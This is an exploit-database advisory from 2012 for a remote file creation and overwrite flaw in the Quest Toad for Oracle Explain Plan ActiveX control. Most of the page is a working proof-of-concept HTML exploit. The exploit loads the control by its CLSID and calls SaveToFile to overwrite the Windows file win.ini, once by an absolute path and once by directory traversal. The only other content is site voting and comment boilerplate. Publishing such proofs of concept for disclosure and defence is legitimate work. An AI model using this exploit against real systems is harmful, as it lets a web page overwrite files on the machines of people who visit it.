Quest Toad For Oracle Explain Plan Display File Creation / Overwrite

2012.04.06
Credit: rgod
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<!-- Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115) Remote File Creation / Overwrite vendor site: http://www.quest.com/ file tested: Quest_Toad-Development-Suite-for-Oracle_110R2.exe CLSID: {F7014877-6F5A-4019-A3B2-74077F2AE126} Progid: QExplain2.ExplainPlanDisplayX Binary Path: C:\PROGRA~1\COMMON~1\QUESTS~1\QEXPLA~1.DLL Implements IObjectSafety: True Safe For Initialization (IObjectSafety): True Safe For Scripting (IObjectSafety): True rgod --> <!-- saved from url=(0014)about:internet --> <html> <object classid='clsid:F7014877-6F5A-4019-A3B2-74077F2AE126' id='obj' width=640 height=480 /> </object> <script> try{ obj.SaveToFile("c:\\windows\\win.ini"); }catch(e){ } try{ obj.SaveToFile("../../../../../../../../../../windows/win.ini"); }catch(e){ } </script> original url: http://retrogod.altervista.org/9sg_quest_toad_poc.htm

References:

http://retrogod.altervista.org/9sg_quest_toad_poc.htm


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top